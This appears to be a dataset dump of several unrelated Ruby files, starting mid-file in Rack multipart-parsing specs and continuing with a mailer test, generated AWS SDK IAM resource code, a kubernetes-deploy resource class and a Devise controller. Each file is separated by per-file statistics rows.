Rack::Utils::Multipart.parse_multipart(env).should.equal nil
end
should "parse multipart upload with text file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:text))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse multipart upload with nested parameters" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:nested))
params = Rack::Utils::Multipart.parse_multipart(env)
params["foo"]["submit-name"].should.equal "Larry"
params["foo"]["files"][:type].should.equal "text/plain"
params["foo"]["files"][:filename].should.equal "file1.txt"
params["foo"]["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"foo[files]\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["foo"]["files"][:name].should.equal "foo[files]"
params["foo"]["files"][:tempfile].read.should.equal "contents"
end
should "parse multipart upload with binary file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:binary))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "image/png"
params["files"][:filename].should.equal "rack-logo.png"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"rack-logo.png\"\r\n" +
"Content-Type: image/png\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.length.should.equal 26473
end
should "parse multipart upload with empty file" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:empty))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"file1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal ""
end
should "parse multipart upload with filename with semicolons" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:semicolon))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "fi;le1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; filename=\"fi;le1.txt\"\r\n" +
"Content-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "not include file params if no file was selected" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:none))
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"].should.equal nil
params.keys.should.not.include "files"
end
should "parse IE multipart upload and clean up filename" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:ie))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "text/plain"
params["files"][:filename].should.equal "file1.txt"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
'filename="C:\Documents and Settings\Administrator\Desktop\file1.txt"' +
"\r\nContent-Type: text/plain\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename and modification param" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_and_modification_param))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "image/jpeg"
params["files"][:filename].should.equal "genome.jpeg"
params["files"][:head].should.equal "Content-Type: image/jpeg\r\n" +
"Content-Disposition: attachment; " +
"name=\"files\"; " +
"filename=genome.jpeg; " +
"modification-date=\"Wed, 12 Feb 1997 16:29:51 -0500\";\r\n" +
"Content-Description: a complete map of the human genome\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with escaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_escaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape \\\"quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with percent escaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_percent_escaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape %22quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with unescaped quotes" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_unescaped_quotes))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "application/octet-stream"
params["files"][:filename].should.equal "escape \"quotes"
params["files"][:head].should.equal "Content-Disposition: form-data; " +
"name=\"files\"; " +
"filename=\"escape \"quotes\"\r\n" +
"Content-Type: application/octet-stream\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
should "parse filename with escaped quotes and modification param" do
env = Rack::MockRequest.env_for("/", multipart_fixture(:filename_with_escaped_quotes_and_modification_param))
params = Rack::Utils::Multipart.parse_multipart(env)
params["files"][:type].should.equal "image/jpeg"
params["files"][:filename].should.equal "\"human\" genome.jpeg"
params["files"][:head].should.equal "Content-Type: image/jpeg\r\n" +
"Content-Disposition: attachment; " +
"name=\"files\"; " +
"filename=\"\"human\" genome.jpeg\"; " +
"modification-date=\"Wed, 12 Feb 1997 16:29:51 -0500\";\r\n" +
"Content-Description: a complete map of the human genome\r\n"
params["files"][:name].should.equal "files"
params["files"][:tempfile].read.should.equal "contents"
end
it "rewinds input after parsing upload" do
options = multipart_fixture(:text)
input = options[:input]
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:filename].should.equal "file1.txt"
input.read.length.should.equal 197
end
it "builds multipart body" do
files = Rack::Utils::Multipart::UploadedFile.new(multipart_file("file1.txt"))
data = Rack::Utils::Multipart.build_multipart("submit-name" => "Larry", "files" => files)
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=AaB03x",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["submit-name"].should.equal "Larry"
params["files"][:filename].should.equal "file1.txt"
params["files"][:tempfile].read.should.equal "contents"
end
it "builds nested multipart body" do
files = Rack::Utils::Multipart::UploadedFile.new(multipart_file("file1.txt"))
data = Rack::Utils::Multipart.build_multipart("people" => [{"submit-name" => "Larry", "files" => files}])
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=AaB03x",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params["people"][0]["submit-name"].should.equal "Larry"
params["people"][0]["files"][:filename].should.equal "file1.txt"
params["people"][0]["files"][:tempfile].read.should.equal "contents"
end
it "can parse fields that end at the end of the buffer" do
input = File.read(multipart_file("bad_robots"))
req = Rack::Request.new Rack::MockRequest.env_for("/",
"CONTENT_TYPE" => "multipart/form-data, boundary=1yy3laWhgX31qpiHinh67wJXqKalukEUTvqTzmon",
"CONTENT_LENGTH" => input.size,
:input => input)
req.POST['file.path'].should.equal "/var/tmp/uploads/4/0001728414"
req.POST['addresses'].should.not.equal nil
end
it "builds complete params with the chunk size of 16384 slicing exactly on boundary" do
data = File.open(multipart_file("fail_16384_nofile")) { |f| f.read }.gsub(/\n/, "\r\n")
options = {
"CONTENT_TYPE" => "multipart/form-data; boundary=----WebKitFormBoundaryWsY0GnpbI5U7ztzo",
"CONTENT_LENGTH" => data.length.to_s,
:input => StringIO.new(data)
}
env = Rack::MockRequest.env_for("/", options)
params = Rack::Utils::Multipart.parse_multipart(env)
params.should.not.equal nil
params.keys.should.include "AAAAAAAAAAAAAAAAAAA"
params["AAAAAAAAAAAAAAAAAAA"].keys.should.include "PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"].keys.should.include "new"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"].keys.should.include "-2"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"]["-2"].keys.should.include "ba_unit_id"
params["AAAAAAAAAAAAAAAAAAA"]["PLAPLAPLA_MEMMEMMEMM_ATTRATTRER"]["new"]["-2"]["ba_unit_id"].should.equal "1017"
end
should "return nil if no UploadedFiles were used" do
data = Rack::Utils::Multipart.build_multipart("people" => [{"submit-name" => "Larry", "files" => "contents"}])
data.should.equal nil
end
should "raise ArgumentError if params is not a Hash" do
lambda { Rack::Utils::Multipart.build_multipart("foo=bar") }.
should.raise(ArgumentError).
message.should.equal "value must be a Hash"
end
end
| 42.707965 | 115 | 0.632926 |
b94e2c7f766b237e5300602cc5b07be6a1cece0d | 666 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe MessageMailer, type: :mailer do
it 'sends to the given contact' do
message = Message.new(email: '[email protected]',
message: 'Waow',
name: 'David')
mail = MessageMailer.email(message)
mail.cc.should eq(['[email protected]'])
end
it 'includes the text' do
message = Message.new(email: '[email protected]',
message: 'Waow - mitt meddelande',
name: 'David')
mail = MessageMailer.email(message)
mail.body.should include('Waow - mitt meddelande')
end
end
| 27.75 | 60 | 0.59009 |
b9399cfe3eb1b9e7cc91ea23fbaf72b808cc1b38 | 11,250 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::IAM
class InstanceProfile
extend Aws::Deprecations
# @overload def initialize(name, options = {})
# @param [String] name
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :name
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@name = extract_name(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def name
@name
end
alias :instance_profile_name :name
# The path to the instance profile. For more information about paths,
# see [IAM identifiers][1] in the *IAM User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def path
data[:path]
end
# The stable and unique string identifying the instance profile. For
# more information about IDs, see [IAM identifiers][1] in the *IAM User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def instance_profile_id
data[:instance_profile_id]
end
# The Amazon Resource Name (ARN) specifying the instance profile. For
# more information about ARNs and how to use them in policies, see [IAM
# identifiers][1] in the *IAM User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html
# @return [String]
def arn
data[:arn]
end
# The date when the instance profile was created.
# @return [Time]
def create_date
data[:create_date]
end
# A list of tags that are attached to the instance profile. For more
# information about tagging, see [Tagging IAM resources][1] in the *IAM
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_tags.html
# @return [Array<Types::Tag>]
def tags
data[:tags]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {InstanceProfile}.
# Returns `self` making it possible to chain methods.
#
# instance_profile.reload.data
#
# @return [self]
def load
resp = @client.get_instance_profile(instance_profile_name: @name)
@data = resp.instance_profile
self
end
alias :reload :load
# @return [Types::InstanceProfile]
# Returns the data for this {InstanceProfile}. Calls
# {Client#get_instance_profile} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the InstanceProfile exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (1)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [InstanceProfile]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::InstanceProfileExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(instance_profile_name: @name))
InstanceProfile.new({
name: @name,
client: @client
})
end
# @deprecated Use [Aws::IAM::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
# Waiter will polls until it is successful, it fails by
# entering a terminal state, or until a maximum number of attempts
# are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
#
# yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
# @raise [NotImplementedError] Raised when the resource does not
#
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# instance_profile.add_role({
# role_name: "roleNameType", # required
# })
# @param [Hash] options ({})
# @option options [required, String] :role_name
# The name of the role to add.
#
# This parameter allows (through its [regex pattern][1]) a string of
# characters consisting of upper and lowercase alphanumeric characters
# with no spaces. You can also include any of the following characters:
# \_+=,.@-
#
#
#
# [1]: http://wikipedia.org/wiki/regex
# @return [EmptyStructure]
def add_role(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.add_role_to_instance_profile(options)
resp.data
end
# @example Request syntax with placeholder values
#
# instance_profile.delete()
# @param [Hash] options ({})
# @return [EmptyStructure]
def delete(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.delete_instance_profile(options)
resp.data
end
# @example Request syntax with placeholder values
#
# instance_profile.remove_role({
# role_name: "roleNameType", # required
# })
# @param [Hash] options ({})
# @option options [required, String] :role_name
# The name of the role to remove.
#
# This parameter allows (through its [regex pattern][1]) a string of
# characters consisting of upper and lowercase alphanumeric characters
# with no spaces. You can also include any of the following characters:
# \_+=,.@-
#
#
#
# [1]: http://wikipedia.org/wiki/regex
# @return [EmptyStructure]
def remove_role(options = {})
options = options.merge(instance_profile_name: @name)
resp = @client.remove_role_from_instance_profile(options)
resp.data
end
# @!group Associations
# @return [Role::Collection]
def roles
batch = []
data[:roles].each do |d|
batch << Role.new(
name: d[:role_name],
data: d,
client: @client
)
end
Role::Collection.new([batch], size: batch.size)
end
# @deprecated
# @api private
def identifiers
{ name: @name }
end
deprecated(:identifiers)
private
def extract_name(args, options)
value = args[0] || options.delete(:name)
case value
when String then value
when nil then raise ArgumentError, "missing required option :name"
else
msg = "expected :name to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def yield_waiter_and_warn(waiter, &block)
if !@waiter_block_warned
msg = "pass options to configure the waiter; "\
"yielding the waiter is deprecated"
warn(msg)
@waiter_block_warned = true
end
yield(waiter.waiter)
end
def separate_params_and_options(options)
opts = Set.new(
[:client, :max_attempts, :delay, :before_attempt, :before_wait]
)
waiter_opts = {}
waiter_params = {}
options.each_pair do |key, value|
if opts.include?(key)
waiter_opts[key] = value
else
waiter_params[key] = value
end
end
waiter_opts[:client] ||= @client
[waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection; end
end
end
| 29.605263 | 82 | 0.621244 |
219f2b9032d808de6586195d61615e120a8b6c8e | 161 | require File.expand_path('../../../../spec_helper', __FILE__)
describe "Gem::Requirement#for_lockfile" do
it "needs to be reviewed for spec completeness"
end
| 26.833333 | 61 | 0.732919 |
1a69db24bfe352b49bcbf0edd5be916da0c6add8 | 244 | require "active_support/all"
module TranslationsChecker
module Concerns
module Service
extend ActiveSupport::Concern
class_methods do
def call(*args)
new(*args).call
end
end
end
end
end
| 15.25 | 35 | 0.631148 |
016ba3018f09491cb0ee373d085750b59243db68 | 12,552 | # frozen_string_literal: true
require 'json'
require 'open3'
require 'shellwords'
module KubernetesDeploy
class KubernetesResource
attr_reader :name, :namespace, :context
attr_writer :type, :deploy_started_at
GLOBAL = false
TIMEOUT = 5.minutes
LOG_LINE_COUNT = 250
DISABLE_FETCHING_LOG_INFO = 'DISABLE_FETCHING_LOG_INFO'
DISABLE_FETCHING_EVENT_INFO = 'DISABLE_FETCHING_EVENT_INFO'
DISABLED_LOG_INFO_MESSAGE = "collection is disabled by the #{DISABLE_FETCHING_LOG_INFO} env var."
DISABLED_EVENT_INFO_MESSAGE = "collection is disabled by the #{DISABLE_FETCHING_EVENT_INFO} env var."
DEBUG_RESOURCE_NOT_FOUND_MESSAGE = "None found. Please check your usual logging service (e.g. Splunk)."
UNUSUAL_FAILURE_MESSAGE = <<~MSG
It is very unusual for this resource type to fail to deploy. Please try the deploy again.
If that new deploy also fails, contact your cluster administrator.
MSG
STANDARD_TIMEOUT_MESSAGE = <<~MSG
Kubernetes will continue to attempt to deploy this resource in the cluster, but at this point it is considered unlikely that it will succeed.
If you have reason to believe it will succeed, retry the deploy to continue to monitor the rollout.
MSG
TIMEOUT_OVERRIDE_ANNOTATION = "kubernetes-deploy.shopify.io/timeout-override"
class << self
def build(namespace:, context:, definition:, logger:, statsd_tags:)
opts = { namespace: namespace, context: context, definition: definition, logger: logger,
statsd_tags: statsd_tags }
if definition["kind"].blank?
raise InvalidTemplateError.new("Template missing 'Kind'", content: definition.to_yaml)
elsif KubernetesDeploy.const_defined?(definition["kind"])
klass = KubernetesDeploy.const_get(definition["kind"])
klass.new(**opts)
else
inst = new(**opts)
inst.type = definition["kind"]
inst
end
end
def timeout
self::TIMEOUT
end
def kind
name.demodulize
end
end
def timeout
return timeout_override if timeout_override.present?
self.class.timeout
end
def timeout_override
return @timeout_override if defined?(@timeout_override)
@timeout_override = DurationParser.new(timeout_annotation).parse!.to_i
rescue DurationParser::ParsingError
@timeout_override = nil
end
def pretty_timeout_type
"timeout: #{timeout}s"
end
def initialize(namespace:, context:, definition:, logger:, statsd_tags: [])
# subclasses must also set these if they define their own initializer
@name = definition.dig("metadata", "name")
unless @name.present?
logger.summary.add_paragraph("Rendered template content:\n#{definition.to_yaml}")
raise FatalDeploymentError, "Template is missing required field metadata.name"
end
@optional_statsd_tags = statsd_tags
@namespace = namespace
@context = context
@logger = logger
@definition = definition
@statsd_report_done = false
@validation_errors = []
@instance_data = {}
end
def validate_definition(kubectl)
@validation_errors = []
validate_timeout_annotation
command = ["create", "-f", file_path, "--dry-run", "--output=name"]
_, err, st = kubectl.run(*command, log_failure: false)
return true if st.success?
@validation_errors << err
false
end
def validation_error_msg
@validation_errors.join("\n")
end
def validation_failed?
@validation_errors.present?
end
def id
"#{type}/#{name}"
end
def file_path
file.path
end
def sync(mediator)
@instance_data = mediator.get_instance(kubectl_resource_type, name)
end
def deploy_failed?
false
end
def deploy_started?
@deploy_started_at.present?
end
def deploy_succeeded?
return false unless deploy_started?
unless @success_assumption_warning_shown
@logger.warn("Don't know how to monitor resources of type #{type}. Assuming #{id} deployed successfully.")
@success_assumption_warning_shown = true
end
true
end
def exists?
@instance_data.present?
end
def current_generation
return -1 unless exists? # must be different default than observed_generation
@instance_data["metadata"]["generation"]
end
def observed_generation
return -2 unless exists?
# populating this is a best practice, but not all controllers actually do it
@instance_data["status"]["observedGeneration"]
end
def status
exists? ? "Exists" : "Unknown"
end
def type
@type || self.class.kind
end
def kubectl_resource_type
type
end
def deploy_timed_out?
return false unless deploy_started?
!deploy_succeeded? && !deploy_failed? && (Time.now.utc - @deploy_started_at > timeout)
end
# Expected values: :apply, :replace, :replace_force
def deploy_method
:apply
end
def sync_debug_info(kubectl)
@events = fetch_events(kubectl) unless ENV[DISABLE_FETCHING_EVENT_INFO]
@logs = fetch_logs(kubectl) if supports_logs? && !ENV[DISABLE_FETCHING_EVENT_INFO]
@debug_info_synced = true
end
def debug_message(cause = nil, info_hash = {})
helpful_info = []
if cause == :gave_up
helpful_info << ColorizedString.new("#{id}: GLOBAL WATCH TIMEOUT (#{info_hash[:timeout]} seconds)").yellow
helpful_info << "If you expected it to take longer than #{info_hash[:timeout]} seconds for your deploy"\
" to roll out, increase --max-watch-seconds."
elsif deploy_failed?
helpful_info << ColorizedString.new("#{id}: FAILED").red
helpful_info << failure_message if failure_message.present?
elsif deploy_timed_out?
helpful_info << ColorizedString.new("#{id}: TIMED OUT (#{pretty_timeout_type})").yellow
helpful_info << timeout_message if timeout_message.present?
else
# Arriving in debug_message when we neither failed nor timed out is very unexpected. Dump all available info.
helpful_info << ColorizedString.new("#{id}: MONITORING ERROR").red
helpful_info << failure_message if failure_message.present?
helpful_info << timeout_message if timeout_message.present? && timeout_message != STANDARD_TIMEOUT_MESSAGE
end
helpful_info << " - Final status: #{status}"
if @events.present?
helpful_info << " - Events (common success events excluded):"
@events.each do |identifier, event_hashes|
event_hashes.each { |event| helpful_info << " [#{identifier}]\t#{event}" }
end
elsif ENV[DISABLE_FETCHING_EVENT_INFO]
helpful_info << " - Events: #{DISABLED_EVENT_INFO_MESSAGE}"
else
helpful_info << " - Events: #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
end
if supports_logs?
if ENV[DISABLE_FETCHING_LOG_INFO]
helpful_info << " - Logs: #{DISABLED_LOG_INFO_MESSAGE}"
elsif @logs.blank? || @logs.values.all?(&:blank?)
helpful_info << " - Logs: #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
else
sorted_logs = @logs.sort_by { |_, log_lines| log_lines.length }
sorted_logs.each do |identifier, log_lines|
if log_lines.empty?
helpful_info << " - Logs from container '#{identifier}': #{DEBUG_RESOURCE_NOT_FOUND_MESSAGE}"
next
end
helpful_info << " - Logs from container '#{identifier}' (last #{LOG_LINE_COUNT} lines shown):"
log_lines.each do |line|
helpful_info << " #{line}"
end
end
end
end
helpful_info.join("\n")
end
# Returns a hash in the following format:
# {
# "pod/web-1" => [
# "Pulling: pulling image "hello-world:latest" (1 events)",
# "Pulled: Successfully pulled image "hello-world:latest" (1 events)"
# ]
# }
def fetch_events(kubectl)
return {} unless exists?
out, _err, st = kubectl.run("get", "events", "--output=go-template=#{Event.go_template_for(type, name)}",
log_failure: false)
return {} unless st.success?
event_collector = Hash.new { |hash, key| hash[key] = [] }
Event.extract_all_from_go_template_blob(out).each_with_object(event_collector) do |candidate, events|
events[id] << candidate.to_s if candidate.seen_since?(@deploy_started_at - 5.seconds)
end
end
def timeout_message
STANDARD_TIMEOUT_MESSAGE
end
def failure_message
end
def pretty_status
padding = " " * [50 - id.length, 1].max
"#{id}#{padding}#{status}"
end
def report_status_to_statsd(watch_time)
unless @statsd_report_done
::StatsD.measure('resource.duration', watch_time, tags: statsd_tags)
@statsd_report_done = true
end
end
class Event
EVENT_SEPARATOR = "ENDEVENT--BEGINEVENT"
FIELD_SEPARATOR = "ENDFIELD--BEGINFIELD"
FIELDS = %w(
.involvedObject.kind
.involvedObject.name
.count
.lastTimestamp
.reason
.message
)
def self.go_template_for(kind, name)
and_conditions = [
%[(eq .involvedObject.kind "#{kind}")],
%[(eq .involvedObject.name "#{name}")],
'(ne .reason "Started")',
'(ne .reason "Created")',
'(ne .reason "SuccessfulCreate")',
'(ne .reason "Scheduled")',
'(ne .reason "Pulling")',
'(ne .reason "Pulled")'
]
condition_start = "{{if and #{and_conditions.join(' ')}}}"
field_part = FIELDS.map { |f| "{{#{f}}}" }.join(%({{print "#{FIELD_SEPARATOR}"}}))
%({{range .items}}#{condition_start}#{field_part}{{print "#{EVENT_SEPARATOR}"}}{{end}}{{end}})
end
def self.extract_all_from_go_template_blob(blob)
blob.split(EVENT_SEPARATOR).map do |event_blob|
pieces = event_blob.split(FIELD_SEPARATOR, FIELDS.length)
new(
subject_kind: pieces[FIELDS.index(".involvedObject.kind")],
subject_name: pieces[FIELDS.index(".involvedObject.name")],
count: pieces[FIELDS.index(".count")],
last_timestamp: pieces[FIELDS.index(".lastTimestamp")],
reason: pieces[FIELDS.index(".reason")],
message: pieces[FIELDS.index(".message")]
)
end
end
def initialize(subject_kind:, last_timestamp:, reason:, message:, count:, subject_name:)
@subject_kind = subject_kind
@subject_name = subject_name
@last_timestamp = Time.parse(last_timestamp)
@reason = reason
@message = message.tr("\n", '')
@count = count.to_i
end
def seen_since?(time)
time.to_i <= @last_timestamp.to_i
end
def to_s
"#{@reason}: #{@message} (#{@count} events)"
end
end
def global?
self.class::GLOBAL
end
private
def validate_timeout_annotation
return if timeout_annotation.nil?
override = DurationParser.new(timeout_annotation).parse!
if override <= 0
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: Value must be greater than 0"
elsif override > 24.hours
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: Value must be less than 24h"
end
rescue DurationParser::ParsingError => e
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: #{e}"
end
def timeout_annotation
@definition.dig("metadata", "annotations", TIMEOUT_OVERRIDE_ANNOTATION)
end
def file
@file ||= create_definition_tempfile
end
def create_definition_tempfile
file = Tempfile.new(["#{type}-#{name}", ".yml"])
file.write(YAML.dump(@definition))
file
ensure
file&.close
end
def supports_logs?
respond_to?(:fetch_logs)
end
def statsd_tags
status = if deploy_failed?
"failure"
elsif deploy_timed_out?
"timeout"
elsif deploy_succeeded?
"success"
else
"unknown"
end
tags = %W(context:#{context} namespace:#{namespace} resource:#{id}
type:#{type} sha:#{ENV['REVISION']} status:#{status})
tags | @optional_statsd_tags
end
end
end
| 32.267352 | 147 | 0.63942 |
ab75d3b12acf3aa95b5bf6fc571a3f4d658e44f0 | 1,568 | # frozen_string_literal: true
class Member::RegistrationsController < Devise::RegistrationsController
# before_action :configure_sign_up_params, only: [:create]
# before_action :configure_account_update_params, only: [:update]
# GET /resource/sign_up
# def new
# super
# end
# POST /resource
# def create
# super
# end
# GET /resource/edit
# def edit
# super
# end
# PUT /resource
# def update
# super
# end
# DELETE /resource
# def destroy
# super
# end
# GET /resource/cancel
# Forces the session data which is usually expired after sign
# in to be expired now. This is useful if the user wants to
# cancel oauth signing in/up in the middle of the process,
# removing all OAuth session data.
# def cancel
# super
# end
# protected
# If you have extra params to permit, append them to the sanitizer.
# def configure_sign_up_params
# devise_parameter_sanitizer.permit(:sign_up, keys: [:attribute])
# end
# If you have extra params to permit, append them to the sanitizer.
# def configure_account_update_params
# devise_parameter_sanitizer.permit(:account_update, keys: [:attribute])
# end
# The path used after sign up.
# def after_sign_up_path_for(resource)
# super(resource)
# end
# The path used after sign up for inactive accounts.
# def after_inactive_sign_up_path_for(resource)
# super(resource)
# end
def icon
icon = Icon.find(params[:id])
send_data icon.content, :filename => icon.name, :type => icon.content_type
end
end
| 23.402985 | 78 | 0.695153 |
b90b5734c0687cec9088be3c14049b5a675ef0b6 | 2,440 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sigv4'
require 'aws-sdk-core'
require_relative 'aws-sdk-rds/types'
require_relative 'aws-sdk-rds/client_api'
require_relative 'aws-sdk-rds/client'
require_relative 'aws-sdk-rds/errors'
require_relative 'aws-sdk-rds/waiters'
require_relative 'aws-sdk-rds/resource'
require_relative 'aws-sdk-rds/account_quota'
require_relative 'aws-sdk-rds/certificate'
